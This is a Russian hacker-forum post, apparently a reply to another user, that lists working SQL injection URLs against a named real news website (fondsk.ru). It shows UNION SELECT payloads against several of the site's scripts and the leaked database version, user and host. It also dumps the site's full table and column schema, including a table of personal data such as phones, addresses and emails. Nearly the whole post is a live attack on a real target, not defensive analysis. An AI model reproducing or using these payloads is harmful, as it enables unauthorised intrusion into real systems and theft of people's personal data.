|
Banned
Регистрация: 19.10.2007
Сообщений: 152
С нами:
9769519
Репутация:
415
|
|
Сообщение от Tigger
http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,concat_ws(0x2f,version (),user(),database()),7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25/*
5.0.45-log/u32888@10.10.223.204/u32888
Все таблицы:
http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,table_name,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+in formation_schema.tables/*
Все колонки:
http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,column_name,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+i nformation_schema.columns/*
Внесу некоторые коррективы:
http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26--
, т.е. столбцов 26, а не 25.
Список таблиц и столбцов получается так:
Код:
http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.tables+limit+0,1--
http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,column_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.columns+where+table_name+like+char(112,101,114,115,111,110)+limit+0,1--
Так же имеются и другие дырявые скрипты:
Код:
http://www.fondsk.ru/article.php?id=1505+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
http://www.fondsk.ru/page.php?id=6+union+select+1,2,3,4,5,6,7,8--
http://www.fondsk.ru/articlelist.php?section_id=2+union+select+1--
http://www.fondsk.ru/articlelist.php?§ion_id=14&mode=brief'
http://www.fondsk.ru/author.php?id=160'
http://www.fondsk.ru/articlelist.php?author_id=6'
Список таблиц-столбцов:
Код:
**********************
article
----------------------
id
section_id
author1_id
author2_id
author3_id
title
subtitle
keywords
body
flag_hidden
date_publish_ru
date_publish_en
date_create
descript
imgurl
flag_hidden_mui
tik_id
tags
**********************
author
----------------------
id
lastname
firstname
secondname
fio
prefix
suffix
title
bio
**********************
comment
----------------------
id
article_id
comment_id
author
email
subject
body
flag_hidden
flag_approved
date_publish
ip
**********************
content
----------------------
id
title
subtitle
body
createdate
type
parentid
**********************
page
----------------------
id
name
keywords
flag_hidden
body
sequence
url
flag_hidden_mui
**********************
partner
----------------------
id
name
url
flag_hidden
sequence
flag_hidden_mui
bannerurl
**********************
partner_article
----------------------
id
partner_id
title
subtitle
url
flag_hidden
hits
sequence
author
**********************
person
----------------------
id
login
firstname
secondname
lastname
newlastname
birthdate
group_id_before
group_id_after
degree_id
married
sex
jobplace
jobplace_show
industry_id
position
position_show
jobsite
phoned
phoned_show
phoner
phoner_show
phonem
phonem_show
email
email_show
homepage
country_id
city
address
address_show
alive
status
interest_prof
hobby
comment
admin_comment
children
webpage
**********************
section
----------------------
id
name
keywords
sequence
flag_hidden
flag_hidden_mui
type
imgurl
**********************
stat
----------------------
tm
ip
useragent
url
**********************
subscriber
----------------------
id
email
flag_hidden
activationcode
periodicity
flag_hidden_mui
**********************
subscription
----------------------
id
dtstart
dtend
status
dtlaunch
mailsent
flag_hidden_mui
periodicity
**********************
tik
----------------------
id
name
subtitle
url
**********************
|